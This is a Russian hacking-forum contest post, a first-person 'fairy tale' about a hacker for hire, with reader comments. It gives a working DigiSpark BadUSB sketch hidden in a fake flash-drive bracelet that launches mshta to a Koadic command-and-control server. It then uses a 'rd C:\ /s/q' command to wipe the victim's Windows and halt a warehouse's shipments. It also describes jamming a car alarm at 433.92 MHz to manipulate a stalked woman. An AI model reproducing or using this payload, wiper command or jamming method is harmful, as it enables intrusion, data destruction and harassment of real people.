• Познакомьтесь с пентестом веб-приложений на практике в нашем новом бесплатном курсе

    «Анализ защищенности веб-приложений»

    🔥 Записаться бесплатно!

  • CTF с учебными материалами Codeby Games

    Обучение кибербезопасности в игровой форме. Более 200 заданий по Active Directory, OSINT, PWN, Веб, Стеганографии, Реверс-инжинирингу, Форензике и Криптографии. Школа CTF с бесплатными курсами по всем категориям.

Конкурс Будни ламера - часть 1

"Статья для участия в конкурсе Конкурс 2018 года - авторская статья по любой тематике нашего форума! "

Привет форум. Эта сказка является продолжением статей, который я давненько хотел обновить.
Все, о чем пойдет речь ниже вымысел бурной фантазии автора.

================
Добрых суток мальчики и девочки, с теплым приветствием всем открывшим дверь этой сказки. Это сказка написана сама по себе, она не была выхвачена из грез, навеянных музой пославшей озарение в орган, отвечающий за мыслительные процессы. Это сказка написана жизнью….

1_i9V-ryRsqdRvaTBXcfmGBA.jpeg


Утро – когда по звонку будильника, мобильника, позыву организма просыпается большая часть населения Земного Шара, гонимые на очередную охоту за еду, кров, выживание, самореализации, освобождение организма от вчерашнего бурного вечера с вечным обещанием – я так больше не буууудуууу….По всей видимости мой сосед сверху был поднят с постели именно таким позывом, его потуги над пропастью под веселый трек некогда модной попсы Руки Вверх АЛЕШКА поставленные на репит , могли легко завоевать кучу лавкой на Ютубе. Кнопка на тв погроме – Сегодня была задержана очередная партия контрафактных лекарств от бесплодия……
Душ – теплые струи ласкают тело, смывая ночное сало, освобождая поры, унося в смывной кружочек в виде ромба усталость, вялость, остатки ночных грез… Альпийская свежесть – не знаю как она пахнет на самом деле, верю производителю геля для душа, обильно напенивая губку для теля….никогда не понимал людей, которые не заботятся о своей гигиене – эти люди встречаются везде, в любом социальном статусе, они словно тюлени обвалявшиеся в рыбьем жире идут тебе навстречу с улыбкой на лице, демонстрируя зубы с белым налетом, с засаленными волосами и кусками перхоти, источающими запах кошачьего туалете, протягивая ладонь для приветствия… и ты стоишь в раздумьях – что с этим делать, откуда его ладонь только явилась свету….Именно с таким человеком через 40 минут была встреча. Именно этот человек был крупным заказчиком платившим по счетам с точностью швейцарских часов, был постоянным. Но находиться с ним рядом было невозможно, именно по этой причине место нашей встречи был выбран вейп бар, в которым было дымно, пахло разными экзотическим смесями, фруктами, ягодами – химией, это хоть как то позволяло перенести жесть ароматизации Петра Викторовича.

Рванные с джинсы, высокие конверсы, свитшот с нейтральным принтом, бомбер, шапка чернее ночи “Fuc# All”, пару пшиков D$G, массивные Disiel на руку – я готов. В лифте встречаю соседа сверху – вяло говорит мне Привет, сидит в углу, сжимая влажными руками купюру в 500 рублей.
Привет – в ответ.

Осеннее утро, свежесть, легкий мороз – множество спешащих по делам с разными лицами людей: угрюмые, серые, с двойным макияжем, опухшие, шатающиеся, помятые – вообще рано утром я вижу мало счастливых лиц, но кто в этом виноват?

- На студийных часах восемь утра! И сейчас с нами группа Karsa с треком ЯМАЙКА. Хорошего настроения! – делаем звук громче.

Твинтурбо, спортивный выхлоп от которого начинают работать сигнализации у припаркованных машин, приоткрытый люк – обожаю запах осени и звук двигателя – выруливаем на основную магистраль в к центру города, лапти 18 радиуса на низком профиле уверенно липнут к дорожному покрытию – 100-120 – 130, машина прилипла к дороге, - тело вжимает в удобное кожанное кресло из белой кожи – 150 – два клика на датчик света ( просьба уступить дорогу ) ползущую впереди новую Камри, Камри пытается топить – 180 – почти бодаю ее в попу, 190 – Камри без поворотников уходит на правую часть дороги, моргаю аварийкой….покатушки на драйве пробуждают лучше кофе…

место встречи – вейп бар Smok Of Liberty, заказываю большое капучино с корицей и электронный кальян, который даже не попробую, он будет просто стоять на столе как самый авариный вариант, если будет мало дыма который перекроет знойность Петры Викторовича.

- Вы как всегда пунктуальны – тянет свою руку с которой я опять не знаю что делать, жму отвлекаясь от разных мыслей, отсаживаюсь в отдельное кресло на против, уступив ему диван. – вот Ваша компенсация, информация оказалась проверенной, мы довольны…А вот это – постучал по столу уголком белого конверта – следующий контракт. Предоплата с шакашми - подвинул конверт ближе.

*шашками – так Петр называл адрес объекта с которым надо было провести работу. Почему ШАШКА/ШАШКИ мне было совсем не понятно, ломать голову было лень, спросить не удобно. Быть может у него такой фетишь, мне до этого нет дела.

- Сроки?
- 13 дней, как обычно.
- Доп. Опции будут?
- Никаких.

*13 дней – это было счастливое число для ПВ, он носил футболки с принтом 13, его машина была с номером 013, браслет на руке с глазированным шариком синего цвета число 13 на боку. Бейсболка – 13. Видя это вспоминается вирусный ролик от Ивлеевой – 15 см, 15 см.

Еще 20 минут разной водяной болтовни про машины, удочки, смартфоны, политику, собак. Прощаемся, расходимся. Его тюленье немытое тело погружается в новый Кайен, в салоне которого в приоткрытую в дверь видно кучу оберток от фаст.фуда, коробки из под бананов, спасательный круг на переднем сидение пассажира – странный он какой то….директор торговой сети….который мочит своих поставщиков… которые принадлежат ему же… В чем соль братцы? Чем мочит? Что вообще тут происходит? О чем вообще волна букв летает?

……Петр Викторович директор ( владелец ) крупной торговой сети с более чем 30 магазинами продуктов, он де СОвладлелец нескольких крупных оптовых баз, откуда идет отгрузка товара в эти самые магазины. Вторым Совладельцем его партнёр по бизнесу Гуслим Магамедов, некогда крупный рыночный магнат, разорившийся в начале 2000 годов с приходом красивых магазинов с форматом у дома. Свои склады он скооперировал с Петром Викторовичем, так как на эти склады уже была отлажена поставка. Всем хорошо, всем выгодно. ВП заказывает товар в магазины, ГМ ему их поставляет. ВП имеет % от прибыли магазинов и % от торговли со складов, так как он и там. Но, захотелось ВП проучить ГМ, узнав как тот начал отпускать мимо кассы много товару на сторону. Ругаться было не выгодно – ГМ мог разорвать отношения с ВП, который останется без поставщика для своих магазинов, поэтому он решил его гнуть по тебе IT. Схема проста до одури: как бы там ни было, по документам между ООО Магазины и ООО склад заключен договор на поставку продуктов, со всякими штрафами и не устойками, оплачивать которые будет ГМ.

на определённую дату ВП заказал свежую тушку курицы общей суммой на 6 000 000 рублей, эту курицу ГМ закупает у Агрохозяйства Золотой Петушок, задача – не дать в этот день сделать отгрузку Петушком для ГМ, поставка будет сорвана, ГМ будет вынужден оплатить неустойку ( потерянную прибыл ) ВП в сумме 1 850 000 рублей, из них, 350 000 премия исполнителю, 50% которой уже лежало в белом конверте в бардачке несущегося на следящую встречу автомобиля.

-Алексей – голос дрожащий – Мне Сергей Николаевич порекомендовал….Такая ситуация конечно….

В ресторане больше никого не было, Алексея это явно смущало, стараясь говорить шёпотом он терял интонацию, слома становились не ясными, шепелявыми, с проглоченными буквами. А сама ситуация банальна для нашего времени: Алексей + Маша ( а Маша ли) занялись бурным виртуальным удовлетворением через веб камеру, а когда Леша бурно закончил в стакан, как просила этого Маша, сидя голой попой на горлышке бутылки, ему видали текст: МАЛОЙ, С ТЕБЯ 400 000 РУБЛЕЙ ИЛИ ЗАВТРА ЭТОТ ВИДОС ПО ВСЕМ ПАБЛИКАМ ВК ПОЛЕТИТ. ПОНЯЛ? БАБКИ В БИТКАХ, КУДА ЧТО СЛАТЬ НАПИШЕМ ВЕЧЕРОМ! В ПОЛИЦИЮ КИНЕШЬ ЗАЯВУ –НА ТВ ПУСТИМ!....ну хрен с ним конечно бы Леше, если бы не был он чиновником олицетворяющего семейные ценности, помогая ( ? ) молодым семьям жить в радости, верности, получать денежки, квартиры. Эх Лешка Лешка….

…и что мне встанет в деньгах? Только напоминаю – условие Вы находите кто это сделал, без полиции, сообщаете мне координаты этих людей, если все сходится, оплачиваю сразу всю сумму.

на салфетке ярко красного цвета гелиевая ручка рождает цифры, которые намного значимее вышедших из уст Алексея. --- Но ннооо это очень многооо? Да…никак нельзя проще сделать ?

- При всем уважении к Вам, Сергею Николаевичу – НЕТ. – Как решите – сообщите. Всего доброго!

Синоптики не обманули – город накрыли массивные тучи, заслонившие источник витамина D через лучи. Мелкие капли по лобовому стеклу сменились ударными волнами, дворники активно включились в обеспечение безопасности водителя, люк пришлось закрыть…скорость потока снизилась, однако на точку встречи я все равно успевал во время. На парковке долго искал тонированную семерку выбравшуюся из лона Волжского Авто Завода – таких там было сотни, обнаружил ее возле домика для тележек из прозрачного пластика. А в ней Антон – который вчера просил – Бро! Ну помоги с ней познакомиться, она такая клевая! Ты же все можешь! Ну давай ей ВК хакнем, а я типо ей его верну, или там телефон взломаем, а я такой хоба – чиню! – решение было более эстетичное.

* Антон, еще один малый из моего круга общения – простой пацан, который умеет хорошо выполнять мелкие поручения, в виде поехать на точку А и посидеть с ноутбуком в багажнике с направленной в нужную сторону антенной пару часов. Уже пару неделю ему не дает покоя новая соседка по дому, от которой Антон теряет дар речи, покрывается мурашками, ведет как дебил проходя мимо нее.

- Где ее тачка?
- Воон за тем Лексусом, Лансер красный!
- Ок, готовься. Она через 10 минут заканчивает, наверное, сразу поедет в фитнес, судя по расписанию.
- Как ты все успел?
- Магия!

*магия….ну достаточно было изучить ее профиль в соц.сети, найти паблики в которых она состоит, отсеять все фотки, друзей: первая половина дня – продавец консультант в магазине спортивного питания в торгов центре, после обеда фитнес тренер на испытательном сроке в клубе, расписание коьторого уже имеется на сайте с ее ФИО и временем.

-ВЫШЛА! – Антон покрылся мурашками, обильный пот выступил на его большом лбу, глаза стали как под конкретной наркотой

Дева почти бегом спешила к своей красной машинке, ей оставалось всего 30 минут до фитнеса, куда еще надо было успеть, рука ныряет в розовую сумку, связка ключей с брелоком сигнализации уже зажата ладонью, еще мгновение, большой палец жмет кнопку открытия дверей машины, дерганье ручки дверей на себя…и…и ничего…машина не пускает в салон, большой палец жмет еще и еще – никакой реакции, фары не моргают, дверь не открывается….частота 433.920 MHz на которой работает 80% сигнализаций забита ( заглушена ) китайской радиостанцией купленной в ближайшем рыболовном магазине по цене одна тысяча четыреста рублей с выставленной частотой для эфира 433.920.

- Беги давай – палец уже устал.
Антон почти шатаясь вышел из своего посаженного демона, поплыл к Лансеру решать ситуацию. Переминаясь словно с пакетом запрещеннки в анальном отверстии, Антоша что то пытался говорить, ломал руки, шатался, взял ключи – сам попробовал, конечно ничего не открылось…ее сумку перекочевала к нему, они быстро шагают к семерке…вот и все. Аккуратно покинул карету будущей любви, вернулся к себе.

-БРАТАН!!!! Я ЕЕ ДО ФИТНЕСА ПОДВЕЗ!!! ВЕЧЕРОМ ТАЧКУ БУДУ ЕЙ ЧИНИТЬ!!!! ОНА ПИЗ#ЕЦ КЛЕВАЯ!!! СПАСИБО!!!! – ну что, от сердца прям слова. Будем помогать сердцам искать друг друга.


- В какой время случилась ситуация? – отложил телефон с радостным сообщением подальше от ноутбука товарища менеджера по продажам невидимости

- Где то в 15-20, 15-30.
- А описать подробно можете, дословно прям?
- В 15-00 у нас назначена сделка по покупке дома, все документы готовы, клиент готов был оплатить наличкой всю сумму сразу при заключении договора. Мы встречаемся, он начинает изучать договор, уточняет некоторые мелочи, затем ему звонит телефон, он странно отвечает, потом просто уходит. Мы думали он на улицы вышел поговорить, однако более не вернулся. Через день мы узнаем – дом он купил, связавшись на прямую с владельцем. Ему кто то дал прямой адрес человека.
-А смысл кому то давать?
-Дело очень щепетильное…дом продает иностранец, бывший гражданин СССР, который убыл на Запад, получил там гражданство, дом принадлежал его тете, мы его уговорили его продать нам за 4.200.000 рублей, а вот покупателя мы смогли уговорить купить за 6.500.000. Понимаете, А теперь некто свел их, мы потеряли прибыл и БАЗУ! Таких объектов у нас десятки! Мы берем предоплату с клиента, ВЫКУПАЕМ объект и перепродаем!
- А ваши сотрудники?
-Нет, это мой ноутбук и база только моя.

Все тайное становится явным. На ноутбуке стоит Windows 7, программа USBDeview и вуаля, смотрим список подозреваемых, кто мог обесчестить бедный серый Асус эпохи цифрового прорыва ядро-гонки синих и красных.


Из всего списка меня привлекли две вещи

1) судя по всему уже больше 5 месяцев ничего в юсб порты не вставлялось – мышка в том числе, человек использует тач.пед
2) последнюю неделю активно фигурирует некое подключение в виде Samsung Android USB Modem и Samsung Android USB Mass Storage Device….

- Вы телефон используете в качестве модема?
- Нет…только кабель…и у меня айфон, я могу его как точку доступа использовать
Посмотрел прописанные точки доступа – только iphone 6 ( Александр ). А тут как модем использовать пытались. Это какой век то? Или на Самсунге не работает точка доступа? Он такой древний или такой нерабочий.

- Дети есть?
- Дочь.
- Телефон какой?
- Айфон 7
- Жена?
- Айфон 8
- Они к компьютеру доступ имеют? В теории да – я его никогда не закрываю, так как много работаю дома, да и от них там нечего скрывать, они его даже боятся трогать – сломают, хлеба лишусь, а хлебом своим с ними делюсь …
- Тогда вот Вам решение - кто имеет телефон Самсунг и есть Ваше несчастье. Думайте. Как найдете – обращайтесь, продолжим.

Уже вечерело, дел особых небыло, поэому було решено заехать забрать еще чудных футляров из селикона для Digi Spark
вот такой браслет именно ярко-красного цвета с надписью ЛИЧНЫЕ ФОТО ДЛЯ КАСТИНГА

flash.jpg


зачем нам эта флешка? оу...мои дорогие друзья, наверное забегу вперед и чуть чуть назад. Вернемся к заказм ВП. Как по вашему можно сорвать поставку? В день поставки уничтожить системы, на которох работают операторы. Уничтожиьт систему, куда приъодят заявки, почта, стоит программа с остатком, резервом, учетом склада. Но как это можно сделать проще всего и надежнее если учесть - почти у всех стоит Windows 10 на котором лютует уже зарекомендовавший себя Defender...

Все просто. Нам понадобится

Скетч:
#include "DigiKeyboard.h"

#define KEY_ALT 226
#define KEY_SHIFT A0

void setup()
{
DigiKeyboard.update();
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.delay(200);

DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
DigiKeyboard.delay(200);

DigiKeyboard.sendKeyStroke(KEY_ALT, KEY_SHIFT);
DigiKeyboard.delay(200);

DigiKeyboard.println("cmd.exe");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(200);

DigiKeyboard.sendKeyStroke(KEY_ALT, KEY_SHIFT);
DigiKeyboard.delay(200);

DigiKeyboard.println("mshta ");
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(200);


delay(50);

DigiKeyboard.sendKeyStroke(KEY_ENTER);
}

void loop()

{
}

Koadic:
Тема про него тут Koadic - Command & Control

VPS сервер с настроенным Linux и установленным туда Koadic

Наверное многие поняли - атака идет через подброс флешки как можно ближе к человеку, который отвечает за отпуск товара.

На видео видно - Дефендер включен, и нормально обходится


Послед получения доступа запускаем cmdshell и пишем вот такую команду

rd C:\ /s/q - которая начнет удаление файлов из системы, на скринах ниже видно, что Вин 10 стала нерабоспособной, не пригодной к работе, на ее востановление уходит порядка 2-3 часов в лучшем случае, это если админ активно подорвал попу, установит все драйвера, программы, все настроит, но как показывает практика уходит часов 5. Отгрузка прекращается по техническим причинам, профит.

* Мелкие склады отпсукают по экселю, коорый если рухнет заменят бумажной тетрадкой =) А более крупные, где накладные, расходные, печати, штампы, точный учет - ставят процесс на паузу.

hta_win.png

hta_win2.png

hta_win1.png
flash.jpg hta_win.png hta_win2.png hta_win1.png

...продолжение в части 2, так как все кинуть в одну будет длинным и не всем удобно так читать. Всем спасибо за просмотр.

про DigiSpark и создание читать тут Делаем USB ducky и Wifi Ducky своими руками
 
Последнее редактирование:

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 186
BIT
0
про bypassUAC )) забыли написать..
с частотами СИГ повезло герою.

PS почему ламер локер не закинул? проще же было бы..
 
Последнее редактирование:

ghostphisher

местный
Grey Team
07.12.2016
2 602
3 413
BIT
0
PS почему ламер локер не закинул? проще же было бы..

Локер - может быть пойман Дефендером, локер - это 100% будет расценено как хакерская атака и есть большая вероятность написания заявления в сопутствующий отдел, а еще на эту атаку компания может списать свои убытки, расходы и все что угодно. К чему это надо, если все можно отобразить словно обычный глюк винды?
Ко всему этому - после такой атаки коимпания может усилить безопасность, а в эту компания быть может придеться вернуться. Зачем же сук пилить на котором сидишь потенциальному злоумышленнику?
 

ghostphisher

местный
Grey Team
07.12.2016
2 602
3 413
BIT
0
А для чего нужна эта флешка?

444.png


после этого мы получаем на ЗА РАНЕЕ ПОДГОТОВЛЕННОЙ СИСТЕМЫ входящее соеденение от системы В КОТОРУЮ ПОПАЛА НАША ФЛЕШКА и мы можем управлять этой системой.

см. видео - в данном случае мы использовали Koadic
 

r0hack

DAG
Gold Team
29.09.2017
522
1 087
BIT
0
Каеф!)

Посмотреть вложение 24186

после этого мы получаем на ЗА РАНЕЕ ПОДГОТОВЛЕННОЙ СИСТЕМЫ входящее соеденение от системы В КОТОРУЮ ПОПАЛА НАША ФЛЕШКА и мы можем управлять этой системой.

см. видео - в данном случае мы использовали Koadic
Нам касперский дала на соревнованиях такие флешки браслеты..... ну вы поняли))
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!